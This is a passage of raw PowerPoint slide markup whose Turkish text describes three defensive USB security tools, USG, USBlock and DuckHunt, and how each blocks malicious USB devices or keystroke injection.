            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iletişimi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>devre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dışı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bırakır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA30EDB-B1C8-476E-A5A1-6E29160A9660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129692" y="4205362"/>
            <a:ext cx="1728041"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a:t>USG</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45131641-F12F-4065-8502-C8EFA530BD1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129692" y="5026626"/>
            <a:ext cx="1728041" cy="1701800"/>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000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>USG, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kötü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazılım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içeren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çubuklarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bulaşmasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>engelleyen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>taşınabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>donanım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenlik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>duvarıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. USG, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihazının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gönderebileceği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sayıda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kabul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>eder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>belirli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gönderilmesine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vermek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>liste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>beyaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>liste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE96C056-E820-4033-B6A9-649B76AB2718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856897" y="4205360"/>
            <a:ext cx="1728041"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USBlock</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E5AD76-53AB-456F-BCED-EB44BF9057F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856897" y="5026624"/>
            <a:ext cx="1728041" cy="170180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000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>USBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>paketlerinin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zamanlamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>özel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zamanlamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ölçerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tespit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etmeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dayanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>savunma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>mekanizmasıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8D70E64-F268-4667-91CB-F57433E7C7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674441" y="1682300"/>
            <a:ext cx="1728041" cy="82703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DuckHunt</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FAAAEA-9CF4-4C5B-9F72-130FA1BDEBC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674441" y="2503564"/>
            <a:ext cx="1728041" cy="1701800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>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dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>DuckHunt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, her </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>türlü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>basit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjeksiyonunu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>durdurabilen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> GitHub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>projesidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavyeden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gibi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görünen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıttan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aldığı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
